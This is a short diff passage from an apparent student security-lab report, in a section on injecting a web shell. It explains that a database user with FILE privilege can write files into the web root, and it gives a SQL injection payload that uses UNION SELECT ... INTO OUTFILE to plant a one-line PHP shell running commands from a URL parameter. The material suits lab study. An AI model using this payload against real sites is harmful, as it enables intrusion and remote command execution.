carrol74/lbs/lab3/Report.md

 6. Injecting a Webshell

    Since we have `/var/www` as an absolute path,  the user with `FILE` privilege can write here a PHP script which executes system commands via URL parameters.
+   Enumerating directories and testing file creation via SQL `INTO OUTFILE`.

-   First try to write into /classes but fail
+   First we tried to write into `/classes` but failed:

    ```sql
    UNION SELECT 1,"<?php system($_GET['c']); ?>",3,4 INTO OUTFILE '/var/www/classes/shell.php'-- -